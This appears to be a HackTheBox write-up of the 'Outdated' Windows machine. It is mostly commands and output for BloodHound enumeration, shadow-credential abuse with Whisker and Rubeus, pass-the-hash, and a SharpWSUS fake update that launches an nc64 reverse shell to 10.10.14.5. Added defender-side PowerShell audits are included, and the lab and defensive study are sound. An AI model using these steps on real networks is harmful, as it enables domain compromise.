HackTheBox: Outdated (Windows, Medium)
Connecting between Windows and Linux
Bloodhound Collection
Grab the latest copy of SharpHound.exe from the BloodHound repo, upload it to Outdated, and run it from C:\programdata:
iwr http://10.10.14.5:8888/SharpHound.exe -outfile s.exe
.\s.exe -C all
2022-07-19T20:34:56.1862643-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-07-19T20:34:56.1862643-07:00|INFORMATION|Initializing SharpHound at 8:34 PM on 7/19/2022
2022-07-19T20:34:56.6237628-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-07-19T20:34:56.8581431-07:00|INFORMATION|Beginning LDAP search for outdated.htb
2022-07-19T20:34:56.8895301-07:00|INFORMATION|Producer has finished, closing LDAP channel
2022-07-19T20:34:56.9050152-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2022-07-19T20:35:26.8931458-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 37 MB RAM
2022-07-19T20:35:45.2917806-07:00|INFORMATION|Consumers finished, closing output channel
2022-07-19T20:35:45.3386471-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2022-07-19T20:35:45.4948968-07:00|INFORMATION|Status: 97 objects finished (+97 2.020833)/s -- Using 59 MB RAM
2022-07-19T20:35:45.4948968-07:00|INFORMATION|Enumeration finished in 00:00:48.6515019
2022-07-19T20:35:45.6198986-07:00|INFORMATION|SharpHound Enumeration Completed at 8:35 PM on 7/19/2022! Happy Graphing!
PS C:\programdata> ls

    Directory: C:\programdata

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
...[snip]...
-a----        7/19/2022   8:35 PM          11477 20220719203544_BloodHound.zip
-a----        7/19/2022   8:35 PM           8753 MjdhMDc5MjItNDk4MS00NjFiLWFkY2ItZjQ0ZTBlODI3Mzhh.bin
-a----        7/19/2022   6:45 PM          45272 nc64.exe
-a----        7/19/2022   8:33 PM         908288 s.exe
Linux:
impacket-smbserver -smb2support share . -username LM -password LM
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Windows (PowerShell):
net use \\10.10.14.5\share /u:LM LM    # connect to the SMB share
The command completed successfully
copy 20220719203544_BloodHound.zip \\10.10.14.5\share
Shell as sflowers on DC
Bloodhound Analysis
I’ll open Bloodhound, clear the database, and upload the Zip file. I’ll search for btables and mark them as owned. Looking closer at btables, they have one “Group Delegated Object Control” under “Outbound Control Rights”:
Clicking on that puts it on the graph:
As a member of the ITSTAFF group, btables has AddKeyCredentialLink on sflowers. Unfortunately, at the time of writing, there’s no abuse info in Bloodhound associated with that link.
Get sflowers NTLM
Shadow credentials
Since we already have a shell on the box as btables, we can use Whisker to abuse this right.
Build Whisker
Git clone the Whisker repository and build it into an exe. I'll set the Build option to Release and Any CPU, and hit Ctrl-Shift-B to build:
Copy the resulting Whisker.exe back to Kali.
Exploit Shadow Credential
Our current shell is as btables.
Upload Whisker.exe to Outdated using iwr:
iwr http://10.10.14.5:8888/Whisker.exe -outfile whisker.exe
Run it to list any existing KeyCredential entries for sflowers:
.\Whisker.exe list /domain:outdated.htb /target:sflowers /dc:DC.outdated.htb
[*] Searching for the target account
[*] Target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb
[*] Listing deviced for sflowers:
[*] No entries!
Add one:
.\Whisker.exe add /domain:outdated.htb /target:sflowers /dc:DC.outdated.htb /password:lisenmiller
[*] No path was provided. The certificate will be printed as a Base64 blob
[*] Searching for the target account
[*] Target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID 5cdd7103-25ea-444a-8a58-7dd254265116
[*] Updating the msDS-KeyCredentialLink attribute of the target object
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] You can now run Rubeus with the following syntax:

Rubeus.exe asktgt /user:sflowers /certificate:<base64 certificate blob> /password:"0xdf0xdf" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show
Upload Rubeus.exe to the box:
iwr http://10.10.14.5:8888/Rubeus.exe -outfile Rubeus.exe
Run the command that Whisker.exe suggests (the /certificate argument is the Base64 blob from the Whisker output; /getcredentials /show is what makes Rubeus print the NTLM hash at the end):
.\Rubeus.exe asktgt /user:sflowers /password:"0xdf0xdf" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show `
  /certificate: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
[Rubeus ASCII-art banner]
  v2.0.3

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=sflowers
[*] Building AS-REQ (w/ PKINIT preauth) for: 'outdated.htb\sflowers'
[*] Using domain controller: 172.16.20.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

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

  ServiceName              :  krbtgt/outdated.htb
  ServiceRealm             :  OUTDATED.HTB
  UserName                 :  sflowers
  UserRealm                :  OUTDATED.HTB
  StartTime                :  7/19/2022 9:35:34 PM
  EndTime                  :  7/20/2022 7:35:34 AM
  RenewTill                :  7/26/2022 9:35:34 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  eS3rWh1yyu+COnBYg9XS8A==
  ASREP (key)              :  86CBEDAED5565CD4F39BE0D34BDCD874

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : 1FCDB1F6015DCB318CC77BB2BDA14DB5
The NTLM hash of sflowers is printed at the end of the output.
We can use Evil-WinRM to log in with it (pass-the-hash):
evil-winrm -u sflowers -H 1FCDB1F6015DCB318CC77BB2BDA14DB5 -i dc.outdated.htb
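The step just completed rests on a single ACL right: ITSTAFF can write msDS-KeyCredentialLink on sflowers (the edge BloodHound draws as AddKeyCredentialLink), and the Whisker add left a KeyCredential entry on the account. The PowerShell audit below is an added, defender-side example; it is not from this writeup, BloodHound, Whisker or Rubeus. It assumes the RSAT ActiveDirectory module and an account that can read user objects and their ACLs; the list of principals it ignores is an assumption to tune per domain.

```powershell
# Added defender-side audit (not part of the writeup, BloodHound or Whisker).
# Assumes: RSAT ActiveDirectory module, read access to user objects and their ACLs.
Import-Module ActiveDirectory

$adRights = [System.DirectoryServices.ActiveDirectoryRights]

# Resolve the schema GUID of msDS-KeyCredentialLink from this forest's schema
# rather than hard-coding it.
$schemaNC = (Get-ADRootDSE).schemaNamingContext
$kclAttr  = Get-ADObject -SearchBase $schemaNC -LDAPFilter '(lDAPDisplayName=msDS-KeyCredentialLink)' -Properties schemaIDGUID
$kclGuid  = [guid]$kclAttr.schemaIDGUID

# 1. Accounts that already carry KeyCredential entries. Windows Hello for Business
#    populates this legitimately; an entry on an account that never enrolled a device
#    (sflowers above, where Whisker reported "No entries!" before the add) is the
#    artifact a shadow-credential attack leaves behind.
Write-Output '== Accounts with msDS-KeyCredentialLink set =='
Get-ADObject -LDAPFilter '(msDS-KeyCredentialLink=*)' -Properties msDS-KeyCredentialLink |
    Select-Object Name, DistinguishedName,
        @{ Name = 'Entries'; Expression = { @($_.'msDS-KeyCredentialLink').Count } }

# 2. Principals, other than the expected admins, that can write the attribute on a user.
#    This is the grant that let ITSTAFF -> sflowers happen above.
Write-Output '== Non-default principals able to write msDS-KeyCredentialLink =='
$netbios = (Get-ADDomain).NetBIOSName
$ignore  = @('NT AUTHORITY\SELF', 'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',   # assumption: tune per domain
             "$netbios\Domain Admins", "$netbios\Enterprise Admins",
             "$netbios\Key Admins", "$netbios\Enterprise Key Admins")

foreach ($user in Get-ADUser -Filter * -ResultPageSize 500) {
    $acl = Get-Acl -Path ('AD:\' + $user.DistinguishedName)
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($ignore -contains $ace.IdentityReference.Value) { continue }
        $r = $ace.ActiveDirectoryRights
        # WriteProperty scoped to this attribute, or to every attribute (empty ObjectType)
        $writesKcl = $r.HasFlag($adRights::WriteProperty) -and
                     ($ace.ObjectType -eq $kclGuid -or $ace.ObjectType -eq [guid]::Empty)
        $generic   = $r.HasFlag($adRights::GenericAll) -or $r.HasFlag($adRights::GenericWrite)
        if ($writesKcl -or $generic) {
            [pscustomobject]@{
                Target     = $user.SamAccountName
                Principal  = $ace.IdentityReference.Value
                Rights     = $r
                ObjectType = $ace.ObjectType
                Inherited  = $ace.IsInherited
            }
        }
    }
}
```

Run it from a domain-joined host; it reads one ACL per user, so it is slow in large domains. The fix for a finding in part 2 is removing the write grant itself (here, ITSTAFF's right over sflowers), not only the entry it was used to plant. A rogue entry can be cleared with Set-ADObject -Identity <dn> -Clear 'msDS-KeyCredentialLink', but that also removes any legitimate Windows Hello keys on the account. For ongoing detection, enabling Directory Service Changes auditing with a SACL on user objects makes each write to the attribute show up as event 5136 on the DC.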
sflowers is a member of the Remote Management Users group, as seen in Bloodhound, or in the output of net user:
PS C:\> net user sflowers /domain
The request will be processed at a domain controller for domain outdated.htb.

User name                    sflowers
Full Name                    Susan Flowers
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            6/20/2022 11:04:09 AM
Password expires             Never
Password changeable          6/21/2022 11:04:09 AM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   7/19/2022 9:35:34 PM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use*WSUS Administrators
Global Group memberships     *Domain Users
The command completed successfully.
Note the WSUS Administrators group.
So this box runs a WSUS server that distributes patches to the Windows machines that update from it.
Shell as system
Enumeration
Googling for "enumerate exploit WSUS" provides a few good leads.
Readers can learn about WSUS from my other article, WSUS instruction.
We can use the tool SharpWSUS.exe.
Upload SharpWSUS.exe to the box through Evil-WinRM:
*Evil-WinRM* PS C:\programdata> upload SharpWSUS.exe sw.exe
Info: Uploading SharpWSUS.exe to sw.exe

Data: 65536 bytes of 65536 bytes copied

Info: Upload successful!
Identify WSUS server
From Client
PS C:\> Get-ItemProperty HKLM:\software\policies\microsoft\windows\WindowsUpdate

AcceptTrustedPublisherCerts                  : 1
ExcludeWUDriversInQualityUpdate              : 1
DoNotConnectToWindowsUpdateInternetLocations : 1
WUServer                                     : http://wsus.outdated.htb:8530
WUStatusServer                               : http://wsus.outdated.htb:8530
UpdateServiceUrlAlternate                    :
PSPath                                       : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows\WindowsUpdate
PSParentPath                                 : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows
PSChildName                                  : WindowsUpdate
PSDrive                                      : HKLM
PSProvider                                   : Microsoft.PowerShell.Core\Registry
And from the DC:
*Evil-WinRM* PS C:\> get-itemproperty HKLM:\software\policies\microsoft\windows\Windowsupdate

SetActiveHours                               : 1
ActiveHoursStart                             : 0
ActiveHoursEnd                               : 23
AcceptTrustedPublisherCerts                  : 1
ExcludeWUDriversInQualityUpdate              : 1
DoNotConnectToWindowsUpdateInternetLocations : 1
WUServer                                     : http://wsus.outdated.htb:8530
WUStatusServer                               : http://wsus.outdated.htb:8530
UpdateServiceUrlAlternate                    :
PSPath                                       : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows\WindowsUpdate
PSParentPath                                 : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows
PSChildName                                  : WindowsUpdate
PSDrive                                      : HKLM
PSProvider                                   : Microsoft.PowerShell.Core\Registry
SharpWSUS.exe will do this as well:
*Evil-WinRM* PS C:\programdata> .\SharpWSUS.exe locate

[SharpWSUS ASCII-art banner]
Phil Keeble @ Nettitude Red Team

[*] Action: Locate WSUS Server
WSUS Server: http://wsus.outdated.htb:8530
[*] Locate complete
From the client, ping will show that it’s the same host as the DC:
PS C:\> ping wsus.outdated.htb

Pinging dc.outdated.htb [172.16.20.1] with 32 bytes of data:
Reply from 172.16.20.1: bytes=32 time<1ms TTL=128
Reply from 172.16.20.1: bytes=32 time=2ms TTL=128
Reply from 172.16.20.1: bytes=32 time<1ms TTL=128
Reply from 172.16.20.1: bytes=32 time<1ms TTL=128

Ping statistics for 172.16.20.1:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 2ms, Average = 0ms
WSUS Information
SharpWSUS.exe will also give information about the clients using the WSUS server:
*Evil-WinRM* PS C:\programdata> .\SharpWSUS.exe inspect

[SharpWSUS ASCII-art banner]
Phil Keeble @ Nettitude Red Team

[*] Action: Inspect WSUS Server

################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
DC, 8530, c:\WSUS\WsusContent

####################### Computer Enumeration #######################
ComputerName, IPAddress, OSVersion, LastCheckInTime
---------------------------------------------------
dc.outdated.htb, 172.16.20.1, 10.0.17763.652, 7/22/2022 5:01:44 AM

####################### Downstream Server Enumeration #######################
ComputerName, OSVersion, LastCheckInTime
---------------------------------------------------

####################### Group Enumeration #######################
GroupName
---------------------------------------------------
All Computers
Downstream Servers
Unassigned Computers

[*] Inspect complete
It only shows the DC, but that's where we want SYSTEM anyway.
Exploit
PsExec
WSUS will only run signed Microsoft binaries. As I have no good way to get a Microsoft signing certificate, I’ll have to use something legitimate. The article suggests the Sysinternals tool PsExec. I’ll download https://download.sysinternals.com/files/SysinternalsSuite.zip, copy PsExec.exe to my webserver, and upload it:
*Evil-WinRM* PS C:\programdata> upload PsExec64.exe \programdata\ps.exe
Info: Uploading PsExec64.exe to \programdata\ps.exe

Data: 685960 bytes of 685960 bytes copied

Info: Upload successful!
I’ll create an update using SharpWSUS.exe. The blog post shows adding an administrator, but I’ll just go for a reverse shell using nc64.exe. The /args for PsExec are -accepteula so that it doesn’t pop a box and wait for a click, -s to run as SYSTEM, and -d to return immediately. The /title is arbitrary.
.\SharpWSUS.exe create /payload:"C:\programdata\ps.exe" /args:" -accepteula -s -d c:\programdata\nc64.exe -e cmd.exe 10.10.14.5 445 " /title:"CVE-2022-30190"

[SharpWSUS ASCII-art banner]
Phil Keeble @ Nettitude Red Team

[*] Action: Create Update
[*] Creating patch to use the following:
[*] Payload: ps.exe
[*] Payload Path: C:\programdata\ps.exe
[*] Arguments: -accepteula -s -d c:\programdata\nc64.exe -e cmd.exe 10.10.14.6 445
[*] Arguments (HTML Encoded): -accepteula -s -d c:\programdata\nc64.exe -e cmd.exe 10.10.14.6 445

################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
DC, 8530, c:\WSUS\WsusContent

ImportUpdate
Update Revision ID: 44
PrepareXMLtoClient
InjectURL2Download
DeploymentRevision
PrepareBundle
PrepareBundle Revision ID: 45
PrepareXMLBundletoClient
DeploymentRevision

[*] Update created - When ready to deploy use the following command:
[*] SharpWSUS.exe approve /updateid:ea097920-0e17-4f9e-8045-0dfc5078a317 /computername:Target.FQDN /groupname:"Group Name"

[*] To check on the update status use the following command:
[*] SharpWSUS.exe check /updateid:ea097920-0e17-4f9e-8045-0dfc5078a317 /computername:Target.FQDN

[*] To delete the update use the following command:
[*] SharpWSUS.exe delete /updateid:ea097920-0e17-4f9e-8045-0dfc5078a317 /computername:Target.FQDN /groupname:"Group Name"

[*] Create complete
I need to approve that update, using the syntax given in the output (/groupname is arbitrary):
*Evil-WinRM* PS C:\programdata> .\sw.exe approve /updateid:ea097920-0e17-4f9e-8045-0dfc5078a317 /computername:dc.outdated.htb /groupname:"CriticalPatches"

[SharpWSUS ASCII-art banner]
Phil Keeble @ Nettitude Red Team

[*] Action: Approve Update

Targeting dc.outdated.htb
TargetComputer, ComputerID, TargetID
------------------------------------
dc.outdated.htb, bd6d57d0-5e6f-4e74-a789-35c8955299e1, 1
Group Exists = False
Group Created: CriticalPatches
Added Computer To Group
Approved Update

[*] Approve complete
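Two facts from this chain are what a defender can act on: every client in the domain, the DC included, fetches updates from http://wsus.outdated.htb:8530 over plain HTTP, and membership in WSUS Administrators alone is enough to stage and approve an arbitrary "update" for the DC (the create and approve output above shows the new revision IDs and the freshly created CriticalPatches group). The PowerShell below is an added example, not from this writeup or from SharpWSUS. Part 1 runs on any client and reads the same WindowsUpdate policy key shown earlier; parts 2 and 3 run on the WSUS server, assume the UpdateServices module that ships with the WSUS role plus local admin rights, and list recently imported updates with their approvals and the members of WSUS Administrators. The seven-day window and the fixed group name are assumptions.

```powershell
# Added defender-side checks (not part of the writeup or SharpWSUS).
# Part 1: any WSUS client. Parts 2 and 3: the WSUS server itself
# (UpdateServices module from the WSUS role, local admin rights).

# ---- Part 1: how does this client reach WSUS? ----
function Test-WsusClientPolicy {
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate'   # same key as the Get-ItemProperty output above
    $p = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if ($null -eq $p -or [string]::IsNullOrEmpty($p.WUServer)) {
        return [pscustomobject]@{ WUServer = $null; Finding = 'No WSUS policy; client talks to Microsoft Update directly.' }
    }
    $findings = @()
    if (([uri]$p.WUServer).Scheme -ne 'https') {
        $findings += 'WUServer is plain HTTP: update metadata is not protected on the path between client and server.'
    }
    if ($p.AcceptTrustedPublisherCerts -eq 1) {
        $findings += 'AcceptTrustedPublisherCerts=1: binaries signed by any certificate in the local Trusted Publishers store are accepted, not only Microsoft-signed ones.'
    }
    if ($findings.Count -eq 0) { $findings = @('OK') }
    [pscustomobject]@{
        WUServer       = $p.WUServer
        WUStatusServer = $p.WUStatusServer
        Finding        = ($findings -join ' ')
    }
}

# ---- Part 2: updates imported recently, and where and by whom they were approved ----
# A planted update looks like the create/approve output above: a brand-new revision,
# approved minutes later, frequently to a target group that did not exist before.
function Get-RecentWsusApprovals {
    param([int]$Days = 7)                                 # window is an assumption; tune it
    Import-Module UpdateServices
    $wsus  = Get-WsusServer                                # local server, default port 8530
    $since = (Get-Date).AddDays(-$Days)
    foreach ($u in $wsus.GetUpdates()) {
        if ($u.CreationDate -lt $since) { continue }
        foreach ($a in $u.GetUpdateApprovals()) {
            [pscustomobject]@{
                Title        = $u.Title
                Created      = $u.CreationDate
                Action       = $a.Action
                TargetGroup  = $a.GetComputerTargetGroup().Name
                ApprovedBy   = $a.AdministratorName
                ApprovalTime = $a.GoLiveTime
            }
        }
    }
}

# ---- Part 3: who can create and approve updates at all ----
function Get-WsusAdminMembers {
    # WSUS Administrators is a local group on a member server, but lives in the
    # domain when WSUS runs on a DC (as on Outdated), so try AD first.
    $members = $null
    if (Get-Command Get-ADGroupMember -ErrorAction SilentlyContinue) {
        $members = Get-ADGroupMember -Identity 'WSUS Administrators' -ErrorAction SilentlyContinue
    }
    if (-not $members) {
        $members = Get-LocalGroupMember -Group 'WSUS Administrators' -ErrorAction SilentlyContinue
    }
    $members | Select-Object Name, ObjectClass
}

Test-WsusClientPolicy
Get-RecentWsusApprovals -Days 7
Get-WsusAdminMembers
```

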